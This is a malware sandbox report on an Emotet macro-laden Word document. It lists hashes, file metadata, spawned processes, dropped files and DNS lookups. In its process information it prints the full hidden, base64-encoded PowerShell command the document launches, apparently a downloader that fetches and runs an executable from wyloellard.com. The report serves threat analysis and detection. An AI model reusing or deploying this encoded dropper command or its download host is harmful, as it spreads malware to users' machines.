analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

info_12_02.doc

Full analysis: https://app.any.run/tasks/43c3649d-22b1-43a0-9ebc-9c15ffde7255
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 02, 2019, 17:05:45
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
maldoc-4
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: Voluptas in quaerat., Author: Lotte Beckel, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 2 09:57:00 2019, Last Saved Time/Date: Mon Dec 2 09:57:00 2019, Number of Pages: 1, Number of Words: 59, Number of Characters: 337, Security: 0
MD5:

D14E126E0623AD7FA919BE02B3EC3485

SHA1:

BB0161C3EF2D1E406677443CF25D4934D047DDE7

SHA256:

0BECDD14E6A2FCF9E5559F11C632CEF8D3A700429E84C166CAEE5A29CA7D4A83

SSDEEP:

1536:Z6FGlpQ3VANwimkJDMeOY5C6OJsdBpZWP35nFRjQN44+a9y:Z6FGlpQ3VANwimkJ4eOY5CTsdAP5Lj5V

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1876)
    • Executed via WMI

      • powershell.exe (PID: 1876)
    • PowerShell script executed

      • powershell.exe (PID: 1876)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2776)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2776)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Forms 2.0 Form
CompObjUserTypeLen: 25
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 395
Paragraphs: 1
Lines: 2
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 337
Words: 59
Pages: 1
ModifyDate: 2019:12:02 09:57:00
CreateDate: 2019:12:02 09:57:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Lotte Beckel
Subject: -
Title: Voluptas in quaerat.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2776"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\info_12_02.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1876powershell -w hidden -en JABOAHAAcgBlAHcAZwB0AGEAdwB2AHkAYQA9ACcAUwBzAG8AawBrAHYAdgBsAHQAZAAnADsAJABWAHYAYwBoAHQAagBqAGIAeQB1AHIAagAgAD0AIAAnADIANQAyACcAOwAkAFoAdwBqAGsAbQBjAHYAbAB6AG4AegBvAD0AJwBVAHoAZwBpAHMAcAB4AGoAJwA7ACQAVgBzAHIAegBwAGUAZABsAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABWAHYAYwBoAHQAagBqAGIAeQB1AHIAagArACcALgBlAHgAZQAnADsAJABIAHkAdQB6AGIAdwBvAHkAZgA9ACcARABtAGsAbQB5AHkAYQBzAGUAcAB2AHQAJwA7ACQAUwBnAG4AdgBsAGIAZQB4AG0AdQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBlAFQALgB3AEUAQgBDAEwASQBFAE4AVAA7ACQAWAB1AHQAawBsAGgAeABzAD0AJwBoAHQAdABwADoALwAvAHcAeQBsAG8AZQBsAGwAYQByAGQALgBjAG8AbQAvAGUAZABnAHIAbwBuAC8AcwBpAGwAbwBmAHQALgBwAGgAcAA/AGwAPQB1AHQAbwB3AGUAbgAxADEALgBjAGEAYgAnAC4AIgBTAGAAcABMAEkAdAAiACgAJwAqACcAKQA7ACQATQBtAHUAbgBiAHkAcQBxAD0AJwBPAGgAdgBqAGQAegBiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFEAcgBoAHYAawB6AGEAZgBhAHYAIABpAG4AIAAkAFgAdQB0AGsAbABoAHgAcwApAHsAdAByAHkAewAkAFMAZwBuAHYAbABiAGUAeABtAHUALgAiAGQATwBXAE4AbABvAEEARABgAEYASQBgAEwARQAiACgAJABRAHIAaAB2AGsAegBhAGYAYQB2ACwAIAAkAFYAcwByAHoAcABlAGQAbAApADsAJABRAG4AdgB3AHUAcgB3AHEAYwA9ACcARgBiAHkAcABqAHQAawBlAG0AZAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFYAcwByAHoAcABlAGQAbAApAC4AIgBsAEUAbgBnAGAAVABoACIAIAAtAGcAZQAgADMAMAA0ADEAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAHIAVAAiACgAJABWAHMAcgB6AHAAZQBkAGwAKQA7ACQAWABxAGMAcQBwAGUAbwBtAG0APQAnAFkAcQB5AHQAawBiAHoAbwBuAHIAJwA7AGIAcgBlAGEAawA7ACQAWAB1AHQAZwBxAGUAdABmAGQAPQAnAFkAZQBvAGcAYgB4AGIAegBzAHIAbwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABVAHEAdQBsAGQAegB1AHAAbwBrAGYAdwA9ACcAWABpAHQAZgBoAHUAYwB6AHAAdgB2AHkAcQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 556
Read events
1 713
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
2776WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7C4.tmp.cvr
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68CC1F5E.wmf
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B70B0BC7.wmf
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8AFE31C.wmf
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4327B06D.wmf
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73F4638A.wmf
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB8C0A03.wmf
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C64B428.wmf
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8CD1609.wmf
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E012B476.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
7
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
wyloellard.com
  • 77.87.212.31
unknown
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info